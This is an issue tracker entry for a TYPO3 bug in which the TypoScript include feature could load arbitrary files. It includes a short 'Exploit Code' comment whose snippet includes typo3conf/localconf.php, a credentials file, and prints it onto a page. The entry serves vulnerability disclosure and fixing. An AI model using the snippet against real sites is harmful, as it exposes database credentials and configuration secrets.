Actions
Bug #24221
closedt3lib_TSparser::checkIncludeLines() does not check files to be included
Start date:
2010-11-28
Due date:
% Done:
0%
Estimated time:
TYPO3 Version:
4.2
PHP Version:
5.2
Tags:
Complexity:
Is Regression:
Sprint Focus:
Description
It is possible to include arbitrary files (including php files) with the TypoScript include file feature
Reported By: Fabrizio Branca
OTRS: 2010111110000019
(issue imported from #M16590)
Files
Updated by Helmut Hummel almost 14 years ago
Exploit Code:
page.999 = TEXT
page.999.value (
<INCLUDE_TYPOSCRIPT: source="FILE:typo3conf/localconf.php">
)
page.999.wrap = < pre>|< /pre>
page.999.htmlSpecialChars = 1
Updated by Oliver Hader over 5 years ago
- Related to Bug #87733: unwanted side-effect in fileDenyPattern added
Updated by Oliver Hader over 5 years ago
- Description updated (diff)
- Target version deleted (
-1)
Actions